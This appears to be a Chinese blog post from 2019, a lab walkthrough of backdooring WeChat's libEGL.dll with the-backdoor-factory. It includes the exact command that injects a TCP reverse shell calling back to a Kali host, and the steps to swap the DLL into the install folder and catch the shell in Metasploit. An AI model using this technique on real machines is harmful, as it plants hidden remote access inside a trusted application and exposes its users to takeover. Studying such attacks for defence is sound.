10.9 利用微信dll反弹shell复现

  该文章仅用于学习交流

参考文章:http://www.sohu.com/a/321677034_99907709

header() 向用户的浏览器发送HTTP报头

echo”<meta charset=’UTF-8’/>”;

header(“Content-Type:text/html;charset=utf-8”);//解决编码问题

header(“location:http://www.hacker.com”);//页面跳转

 

利用微信dll反弹shell

Win7192.168.56.141

Kali192.168.56.139

打开windows7中的微信登录界面,不需要登录,再打开Process Explorer任务管理工具,招待微信所使用的dll文件

 

 

 

这里我们选择libEGL.dll文件,将其复制到kalithe-backdoor-factory目录中,

然后执行代码如下:

python backdoor.py -f libEGL.dll -s reverse_shell_tcp_inline -P 8888 -H 192.168.56.139

其中,-f 表示被劫持的 DLL 文件,-s 表示 shell 的类型,-P 表示 DLL 要连接 远程主机的端口,-H 表示 DLL 连接的远程主机

 

 

 

可以看到生成文件已经存放在backdoored目录下

 

 

 

然后将该文件重新放置在win7的微信安装目录下覆盖

 

之后打开kali中的msf 设置exploit payload,随后设置 lhost lportIP 192.16856.139,端口是 8888,最后输入 exploit 或者 run,监听过来的 shell

开启监听

 

 

 

之后在win7中打开微信,就能在kali中接受到反弹的shell

 

 

posted @ 2019-10-09 16:04  黑空  阅读(264)  评论(0编辑  收藏  举报